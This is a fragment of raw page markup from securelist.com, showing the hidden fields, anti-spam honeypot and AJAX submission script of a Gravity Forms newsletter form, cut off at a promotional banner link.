class='gform_hidden' name='is_submit_11' value='1' /> <input type='hidden' class='gform_hidden' name='gform_submit' value='11' /> <input type='hidden' class='gform_hidden' name='gform_unique_id' value='' /> <input type='hidden' class='gform_hidden' name='state_11' value='WyJbXSIsImIwODQwZTA2ZGQ0NzYwODcyOTBkZjNmZDM1NDk2Y2ZkIl0=' /> <input type='hidden' class='gform_hidden' name='gform_target_page_number_11' id='gform_target_page_number_1624711611_11' value='0' /> <input type='hidden' class='gform_hidden' name='gform_source_page_number_11' id='gform_source_page_number_1624711611_11' value='1' /> <input type='hidden' name='gform_random_id' value='1624711611' 
/><input type='hidden' name='gform_field_values' value='securelist_2020_form_location=' /> </div> </div><p style="display: none !important;" class="akismet-fields-container" data-prefix="ak_"><label>&#916;<textarea name="ak_hp_textarea" cols="45" rows="8" maxlength="100"></textarea></label><input type="hidden" id="ak_js_3" name="ak_js" value="43"/><script>document.getElementById( "ak_js_3" ).setAttribute( "value", ( new Date() ).getTime() );</script></p></form> </div> <iframe style='display:none;width:0px;height:0px;' src='about:blank' name='gform_ajax_frame_1624711611' id='gform_ajax_frame_1624711611' title='This iframe contains the logic required to handle Ajax powered Gravity Forms.'></iframe> <script type="text/javascript"> /* <![CDATA[ */ gform.initializeOnLoaded( function() {gformInitSpinner( 1624711611, 'https://securelist.com/wp-content/themes/securelist2020/assets/images/content/ajax-spinner-red.svg' );jQuery('#gform_ajax_frame_1624711611').on('load',function(){var contents = jQuery(this).contents().find('*').html();var is_postback = contents.indexOf('GF_AJAX_POSTBACK') >= 0;if(!is_postback){return;}var form_content = jQuery(this).contents().find('#gform_wrapper_1624711611');var is_confirmation = jQuery(this).contents().find('#gform_confirmation_wrapper_1624711611').length > 0;var is_redirect = contents.indexOf('gformRedirect(){') >= 0;var is_form = form_content.length > 0 && ! is_redirect && ! 
is_confirmation;var mt = parseInt(jQuery('html').css('margin-top'), 10) + parseInt(jQuery('body').css('margin-top'), 10) + 100;if(is_form){jQuery('#gform_wrapper_1624711611').html(form_content.html());if(form_content.hasClass('gform_validation_error')){jQuery('#gform_wrapper_1624711611').addClass('gform_validation_error');} else {jQuery('#gform_wrapper_1624711611').removeClass('gform_validation_error');}setTimeout( function() { /* delay the scroll by 50 milliseconds to fix a bug in chrome */ jQuery(document).scrollTop(jQuery('#gform_wrapper_1624711611').offset().top - mt); }, 50 );if(window['gformInitDatepicker']) {gformInitDatepicker();}if(window['gformInitPriceFields']) {gformInitPriceFields();}var current_page = jQuery('#gform_source_page_number_1624711611_11').val();gformInitSpinner( 1624711611, 'https://securelist.com/wp-content/themes/securelist2020/assets/images/content/ajax-spinner-red.svg' );jQuery(document).trigger('gform_page_loaded', [1624711611, current_page]);window['gf_submitting_1624711611'] = false;}else if(!is_redirect){var confirmation_content = jQuery(this).contents().find('.GF_AJAX_POSTBACK').html();if(!confirmation_content){confirmation_content = contents;}setTimeout(function(){jQuery('#gform_wrapper_1624711611').replaceWith(confirmation_content);jQuery(document).scrollTop(jQuery('#gf_1624711611').offset().top - mt);jQuery(document).trigger('gform_confirmation_loaded', [1624711611]);window['gf_submitting_1624711611'] = false;wp.a11y.speak(jQuery('#gform_confirmation_message_1624711611').text());}, 50);}else{jQuery('#gform_1624711611').append(contents);if(window['gformRedirect']) {gformRedirect();}}jQuery(document).trigger('gform_post_render', [1624711611, current_page]);} );} ); /* ]]> */ </script> </div> </div> </div> <div class="u-hidden@sm u-mb-spacer-base-"> <div class="c-image c-image--overflow-down@sm"> <a href="https://www.kaspersky.com/next?icid=gl_KNext_acq_ona_smm__onl_b2b_securelist_ban_sm-team___knext___"><img 
